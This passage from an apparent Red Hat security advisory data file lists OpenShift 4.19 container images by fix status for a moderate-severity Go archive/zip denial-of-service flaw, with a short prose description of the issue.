"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434431"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker needs to be able to process a malicious zip archive with an application using the archive/zip package. Additionally, this vulnerability can cause a Go application to consume an excessive amount of CPU and memory, eventually resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
